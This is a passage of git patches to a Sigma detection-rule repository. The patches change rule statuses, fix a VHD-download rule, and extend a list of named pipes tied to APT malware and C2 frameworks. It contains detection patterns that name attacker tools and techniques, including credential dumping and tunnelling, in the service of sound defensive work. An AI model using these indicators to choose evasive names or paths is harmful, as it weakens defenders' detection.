Powershell via COMPRESS OBFUSCATION -status: experimental +status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml index 3ab2295d..99de9dcc 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml @@ -4,7 +4,7 @@ related: - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 type: derived description: Detects Obfuscated Powershell via RUNDLL LAUNCHER -status: experimental +status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml index cb3a4f6c..fa683462 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml @@ -4,7 +4,7 @@ related: - id: 487c7524-f892-4054-b263-8a0ace63fc25 type: derived description: Detects Obfuscated Powershell via Stdin in Scripts -status: experimental +status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml index a305c28b..1d3a652f 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml @@ -4,7 +4,7 @@ related: - id: 63e3365d-4824-42d8-8b82-e56810fefa0c type: derived description: Detects Obfuscated Powershell via use Clip.exe in Scripts -status: experimental +status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml index 85dcade5..3f8b975f 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml @@ -4,7 +4,7 @@ related: - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 type: derived description: Detects Obfuscated Powershell via use MSHTA in Scripts -status: experimental +status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml index 16bd38f5..9212ee14 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml @@ -4,7 +4,7 @@ related: - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b type: derived description: Detects Obfuscated Powershell via use Rundll32 in Scripts -status: experimental +status: unsupported author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml index 749214cf..96f08ddf 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml @@ -4,7 +4,7 @@ related: - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 type: derived description: Detects Obfuscated Powershell via VAR++ LAUNCHER -status: experimental +status: unsupported author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2021/09/18 diff --git a/rules-unsupported/driver_load_tap_driver_installation.yml b/rules-unsupported/driver_load_tap_driver_installation.yml index 8e9b1be1..aaf4ad74 100644 --- a/rules-unsupported/driver_load_tap_driver_installation.yml +++ b/rules-unsupported/driver_load_tap_driver_installation.yml @@ -4,7 +4,7 @@ related: - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 type: derived description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques -status: experimental +status: unsupported author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 modified: 2021/09/21 diff --git a/rules-unsupported/net_dns_high_subdomain_rate.yml b/rules-unsupported/net_dns_high_subdomain_rate.yml index 9fe286d5..a7b0deaf 100644 --- a/rules-unsupported/net_dns_high_subdomain_rate.yml +++ b/rules-unsupported/net_dns_high_subdomain_rate.yml @@ -39,4 +39,4 @@ detection: falsepositives: - Legitimate domain name requested, which should be added to whitelist level: high -status: experimental +status: unsupported diff --git a/rules-unsupported/net_dns_large_domain_name.yml b/rules-unsupported/net_dns_large_domain_name.yml index afaf481d..308ad0e3 100644 --- a/rules-unsupported/net_dns_large_domain_name.yml +++ b/rules-unsupported/net_dns_large_domain_name.yml @@ -34,4 +34,4 @@ detection: falsepositives: - Legitimate domain name requested, which should be added to whitelist level: high -status: experimental \ No newline at end of file +status: unsupported \ No newline at end of file diff --git a/rules-unsupported/net_possible_dns_rebinding.yml b/rules-unsupported/net_possible_dns_rebinding.yml index 2da861a2..e52da4c6 100644 --- a/rules-unsupported/net_possible_dns_rebinding.yml +++ b/rules-unsupported/net_possible_dns_rebinding.yml @@ -1,6 +1,6 @@ title: Possible DNS Rebinding id: ec5b8711-b550-4879-9660-568aaae2c3ea -status: experimental +status: unsupported description: 'Detects DNS-answer with TTL <10.' date: 2019/10/25 author: Ilyas Ochkov, oscd.community diff --git a/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml b/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml index 931cae2c..0fe996cd 100644 --- a/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml +++ b/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml @@ -1,7 +1,7 @@ title: MSI Spawned Cmd and Powershell Spawned Processes id: 38cf8340-461b-4857-bf99-23a41f772b18 description: This rule will looks for Windows Installer service (msiexec.exe) spawned command line and/or powershell that spawned other processes -status: experimental +status: unsupported author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community date: 2020/10/13 references: diff --git a/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml b/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml index 07ca9c1a..955ce84c 100644 --- a/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml +++ b/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml @@ -3,7 +3,7 @@ id: 078235c5-6ec5-48e7-94b2-f8b5474379ea description: This rule will looks any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege #look for MSI start by low privilege user, write the process guid to the suspicious_guid variable #look for child process from the suspicious_guid, alert if it's Windows Installer trying to install package with SYSTEM privilege -status: experimental +status: unsupported author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community date: 2020/10/13 references: diff --git a/rules-unsupported/sysmon_process_reimaging.yml b/rules-unsupported/sysmon_process_reimaging.yml index 3da02214..3caa875e 100644 --- a/rules-unsupported/sysmon_process_reimaging.yml +++ b/rules-unsupported/sysmon_process_reimaging.yml @@ -11,7 +11,7 @@ description: Detects process reimaging defense evasion technique # Rule must trigger if selection1 and selection2 both occurs in timeframe of 120 sec. # Rule logic is currently not supported by SIGMA. # Sysmon v.10.0 or newer is required for proper detection. -status: experimental +status: unsupported author: Alexey Balandin, oscd.community references: - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ diff --git a/rules-unsupported/win_access_fake_files_with_stored_credentials.yml b/rules-unsupported/win_access_fake_files_with_stored_credentials.yml index c8f95ed7..40485658 100644 --- a/rules-unsupported/win_access_fake_files_with_stored_credentials.yml +++ b/rules-unsupported/win_access_fake_files_with_stored_credentials.yml @@ -1,7 +1,7 @@ title: Stored Credentials in Fake Files id: 692b979c-f747-41dc-ad72-1f11c01b110e description: Search for accessing of fake files with stored credentials -status: experimental +status: unsupported author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community date: 2020/10/05 references: diff --git a/rules-unsupported/win_apt_apt29_tor.yml b/rules-unsupported/win_apt_apt29_tor.yml index 60622027..83e2fa41 100644 --- a/rules-unsupported/win_apt_apt29_tor.yml +++ b/rules-unsupported/win_apt_apt29_tor.yml @@ -11,7 +11,8 @@ tags: - attack.t1543.003 date: 2017/11/01 modified: 2020/08/23 -author: Thomas Patzke +author: Thomas Patzke +status: unsupported logsource: product: windows service: system diff --git a/rules-unsupported/win_dumping_ntdsdit_via_dcsync.yml b/rules-unsupported/win_dumping_ntdsdit_via_dcsync.yml index 89358fe1..6e8edac1 100644 --- a/rules-unsupported/win_dumping_ntdsdit_via_dcsync.yml +++ b/rules-unsupported/win_dumping_ntdsdit_via_dcsync.yml @@ -31,4 +31,4 @@ detection: falsepositives: - Legitimate administrator adding new domain controller to already existing domain level: medium -status: experimental +status: unsupported diff --git a/rules-unsupported/win_dumping_ntdsdit_via_netsync.yml b/rules-unsupported/win_dumping_ntdsdit_via_netsync.yml index 8ace6381..88459889 100644 --- a/rules-unsupported/win_dumping_ntdsdit_via_netsync.yml +++ b/rules-unsupported/win_dumping_ntdsdit_via_netsync.yml @@ -27,4 +27,4 @@ detection: falsepositives: - Legitimate administrator adding new domain controller to already existing domain level: medium -status: experimental +status: unsupported diff --git a/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml b/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml index cd2ce7d8..d31c5a55 100644 --- a/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml +++ b/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml @@ -6,7 +6,7 @@ references: tags: - attack.privilege_escalation - attack.t1068 -status: experimental +status: unsupported author: Teymur Kheirkhabarov (source), Daniil Yugoslavskiy (rule) date: 2019/06/03 logsource: diff --git a/rules-unsupported/win_mal_service_installs.yml b/rules-unsupported/win_mal_service_installs.yml index 5afed9f9..7e53f75b 100644 --- a/rules-unsupported/win_mal_service_installs.yml +++ b/rules-unsupported/win_mal_service_installs.yml @@ -34,4 +34,5 @@ detection: condition: selection and 1 of malsvc_* falsepositives: - Penetration testing -level: critical \ No newline at end of file +level: critical +status: unsupported \ No newline at end of file diff --git a/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml b/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml index 2c386e11..3461d755 100644 --- a/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml @@ -34,4 +34,5 @@ fields: - ServiceFileName falsepositives: - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name -level: high \ No newline at end of file +level: high +status: unsupported \ No newline at end of file diff --git a/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml b/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml index 94c1560f..e23e9749 100644 --- a/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml +++ b/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml @@ -8,7 +8,7 @@ tags: - attack.privilege_escalation - attack.t1134 # an old one - attack.t1134.002 -status: experimental +status: unsupported author: Teymur Kheirkhabarov date: 2019/10/26 modified: 2020/09/01 diff --git a/rules-unsupported/win_remote_schtask.yml b/rules-unsupported/win_remote_schtask.yml index 5730b930..8a75470a 100644 --- a/rules-unsupported/win_remote_schtask.yml +++ b/rules-unsupported/win_remote_schtask.yml @@ -1,6 +1,6 @@ title: Remote Schtasks Creation id: cf349c4b-99af-40fa-a051-823aa2307a84 -status: experimental +status: unsupported description: Detects remote execution via scheduled task creation or update on the destination host author: Jai Minton, oscd.community date: 2020/10/05 diff --git a/rules-unsupported/win_remote_service.yml b/rules-unsupported/win_remote_service.yml index 75654260..3a8f351e 100644 --- a/rules-unsupported/win_remote_service.yml +++ b/rules-unsupported/win_remote_service.yml @@ -1,7 +1,7 @@ action: global title: Remote Service Creation id: 4a3a2b96-d7fc-4cb9-80e4-4a545fe95f46 -status: experimental +status: unsupported description: Detects remote execution via service creation on the destination host author: Jai Minton, oscd.community date: 2020/10/05 From ef0f836a7123dddcadfa8ddc61ed614420916d5a Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 29 Oct 2021 08:21:41 +0200 Subject: [PATCH 1362/1367] Fix detection --- rules/windows/file_event/file_event_mal_vhd_download.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/file_event/file_event_mal_vhd_download.yml b/rules/windows/file_event/file_event_mal_vhd_download.yml index ec4aa319..25a34387 100644 --- a/rules/windows/file_event/file_event_mal_vhd_download.yml +++ b/rules/windows/file_event/file_event_mal_vhd_download.yml @@ -1,6 +1,6 @@ title: Suspicious VHD Image Download From Browser id: 8468111a-ef07-4654-903b-b863a80bbc95 -status: experimental +status: test description: Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls references: - https://redcanary.com/blog/intelligence-insights-october-2021/ @@ -8,6 +8,7 @@ references: - https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' date: 2021/10/25 +modified: 2021/10/29 tags: - attack.resource_development - attack.t1587.001 @@ -17,7 +18,7 @@ logsource: definition: in sysmon add ".vhd " detection: selection: - - Image|endswith: + Image|endswith: - chrome.exe - firefox.exe - microsoftedge.exe @@ -26,7 +27,7 @@ detection: - iexplorer.exe - brave.exe - opera.exe - - TargetFilename|contains: '.vhd' #not endswith to get the alternate data stream log Too TargetFilename: C:\Users\Frack113\Downloads\windows.vhd:Zone.Identifier + TargetFilename|contains: '.vhd' #not endswith to get the alternate data stream log Too TargetFilename: C:\Users\Frack113\Downloads\windows.vhd:Zone.Identifier condition: selection falsepositives: - Legitimate user creation From 4b18d5e45c3139a07d7451773859489524a6ed1f Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 29 Oct 2021 09:57:19 +0200 Subject: [PATCH 1363/1367] chore: set status to test --- rules/windows/file_event/sysmon_creation_system_file.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_creation_system_file.yml b/rules/windows/file_event/sysmon_creation_system_file.yml index 00933d3c..bc5be145 100755 --- a/rules/windows/file_event/sysmon_creation_system_file.yml +++ b/rules/windows/file_event/sysmon_creation_system_file.yml @@ -1,6 +1,6 @@ title: File Created with System Process Name id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d -status: experimental +status: test description: Detects the creation of an executable with a system process name in a suspicious folder author: Sander Wiebing date: 2020/05/26 From 8c57d29561d8add581d61950831f8de59cb420a8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?David=20Andr=C3=A9?= Date: Fri, 29 Oct 2021 15:49:04 +0200 Subject: [PATCH 1364/1367] Added turla hyperstack named pipe --- rules/windows/pipe_created/sysmon_mal_namedpipes.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml index 835c6fde..1ed7781b 100644 --- a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml +++ b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml @@ -5,7 +5,7 @@ description: Detects the creation of a named pipe used by known APT malware references: - Various sources date: 2017/11/06 -author: Florian Roth, blueteam0ps +author: Florian Roth, blueteam0ps, elhoim logsource: product: windows category: pipe_created @@ -35,6 +35,7 @@ detection: - '\jaccdpqnvbrrxlaf' #PoshC2 default - '\csexecsvc' #CSEXEC default - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake https://github.com/RiccardoAncarani/LiquidSnake + - 'adschemerpc' # Turla HyperStack - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity condition: selection tags: - attack.defense_evasion From 0de88e2f30ed940c50b9c012c4df7228b99bf9a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?David=20Andr=C3=A9?= Date: Fri, 29 Oct 2021 16:33:07 +0200 Subject: [PATCH 1365/1367] Added four other named pipes and corrected one missing slash --- rules/windows/pipe_created/sysmon_mal_namedpipes.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml index 1ed7781b..5eb24be4 100644 --- a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml +++ b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml @@ -35,7 +35,11 @@ detection: - '\jaccdpqnvbrrxlaf' #PoshC2 default - '\csexecsvc' #CSEXEC default - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake https://github.com/RiccardoAncarani/LiquidSnake - - 'adschemerpc' # Turla HyperStack - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity + - '\adschemerpc' # Turla HyperStack - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity + - '\AnonymousPipe' # Hidden Cobra Hoplight - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a + - '\bc367' # Pacifier - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf + - '\bc31a7' # Pacifier - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf + - '\testPipe' # Emissary Panda Hyerbri - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ condition: selection tags: - attack.defense_evasion From eba2f3b68fd5ef9fd066c468dd474ca3a3827f4b Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 30 Oct 2021 17:28:07 +0200 Subject: [PATCH 1366/1367] add temp folder --- .../windows/registry_event/sysmon_susp_run_key_img_folder.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_susp_run_key_img_folder.yml b/rules/windows/registry_event/sysmon_susp_run_key_img_folder.yml index af430e49..1bbe17ae 100755 --- a/rules/windows/registry_event/sysmon_susp_run_key_img_folder.yml +++ b/rules/windows/registry_event/sysmon_susp_run_key_img_folder.yml @@ -10,7 +10,7 @@ tags: - attack.t1060 # an old one - attack.t1547.001 date: 2018/08/25 -modified: 2020/09/06 +modified: 2021/10/30 logsource: category: registry_event product: windows @@ -27,6 +27,7 @@ detection: - 'C:\Users\Public\' - 'C:\Users\Default\' - 'C:\Users\Desktop\' + - '\AppData\Local\Temp\' - Details|startswith: - '%Public%\' - 'wscript' From 9f7d4a832ed7a56fff638ce136251b90f7af9372 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 31 Oct 2021 07:03:27 +0100 Subject: [PATCH 1367/1367] Update sysmon_mal_namedpipes.yml --- .../pipe_created/sysmon_mal_namedpipes.yml | 59 +++++++++++-------- 1 file changed, 35 insertions(+), 24 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml index 5eb24be4..b6b948ec 100644 --- a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml +++ b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml @@ -3,8 +3,19 @@ id: fe3ac066-98bb-432a-b1e7-a5229cb39d4a status: experimental description: Detects the creation of a named pipe used by known APT malware references: - - Various sources + - https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/ + - https://securelist.com/faq-the-projectsauron-apt/75533/ + - https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf + - https://www.us-cert.gov/ncas/alerts/TA17-117A + - https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html + - https://thedfirreport.com/2020/06/21/snatch-ransomware/ + - https://github.com/RiccardoAncarani/LiquidSnake + - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity + - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a + - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf + - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ date: 2017/11/06 +modified: 2021/10/30 author: Florian Roth, blueteam0ps, elhoim logsource: product: windows @@ -13,33 +24,33 @@ logsource: detection: selection: PipeName: - - '\isapi_http' # Uroburos Malware Named Pipe - - '\isapi_dg' # Uroburos Malware Named Pipe - - '\isapi_dg2' # Uroburos Malware Named Pipe - - '\sdlrpc' # Cobra Trojan Named Pipe http://goo.gl/8rOZUX + - '\isapi_http' # Uroburos Malware + - '\isapi_dg' # Uroburos Malware + - '\isapi_dg2' # Uroburos Malware + - '\sdlrpc' # Cobra Trojan - '\ahexec' # Sofacy group malware - - '\winsession' # Wild Neutron APT malware https://goo.gl/pivRZJ - - '\lsassw' # Wild Neutron APT malware https://goo.gl/pivRZJ - - '\46a676ab7f179e511e30dd2dc41bd388' # Project Sauron https://goo.gl/eFoP4A - - '\9f81f59bc58452127884ce513865ed20' # Project Sauron https://goo.gl/eFoP4A - - '\e710f28d59aa529d6792ca6ff0ca1b34' # Project Sauron https://goo.gl/eFoP4A - - '\rpchlp_3' # Project Sauron https://goo.gl/eFoP4A - Technical Analysis Input - - '\NamePipe_MoreWindows' # Cloud Hopper Annex B https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, US-CERT Alert - RedLeaves https://www.us-cert.gov/ncas/alerts/TA17-117A - - '\pcheap_reuse' # Pipe used by Equation Group malware 77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0 - - '\gruntsvc' # Covenant default named pipe - # - '\status_*' # CS default named pipes https://github.com/Neo23x0/sigma/issues/253 - - '\583da945-62af-10e8-4902-a8f205c72b2e' # SolarWinds SUNBURST malware report https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html - - '\bizkaz' # Snatch Ransomware https://thedfirreport.com/2020/06/21/snatch-ransomware/ - - '\svcctl' #Crackmapexec smbexec default named pipe + - '\winsession' # Wild Neutron APT malware + - '\lsassw' # Wild Neutron APT malware + - '\46a676ab7f179e511e30dd2dc41bd388' # Project Sauron + - '\9f81f59bc58452127884ce513865ed20' # Project Sauron + - '\e710f28d59aa529d6792ca6ff0ca1b34' # Project Sauron + - '\rpchlp_3' # Project Sauron + - '\NamePipe_MoreWindows' # Cloud Hopper - RedLeaves + - '\pcheap_reuse' # Pipe used by Equation Group malware + - '\gruntsvc' # Covenant default + # - '\status_*' # CS default https://github.com/Neo23x0/sigma/issues/253 + - '\583da945-62af-10e8-4902-a8f205c72b2e' # SolarWinds SUNBURST malware + - '\bizkaz' # Snatch Ransomware + - '\svcctl' #Crackmapexec smbexec default - '\Posh*' #PoshC2 default - '\jaccdpqnvbrrxlaf' #PoshC2 default - '\csexecsvc' #CSEXEC default - - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake https://github.com/RiccardoAncarani/LiquidSnake - - '\adschemerpc' # Turla HyperStack - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity - - '\AnonymousPipe' # Hidden Cobra Hoplight - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a - - '\bc367' # Pacifier - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf - - '\bc31a7' # Pacifier - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf - - '\testPipe' # Emissary Panda Hyerbri - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ + - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake + - '\adschemerpc' # Turla HyperStack + - '\AnonymousPipe' # Hidden Cobra Hoplight + - '\bc367' # Pacifier + - '\bc31a7' # Pacifier + - '\testPipe' # Emissary Panda Hyerbri condition: selection tags: - attack.defense_evasion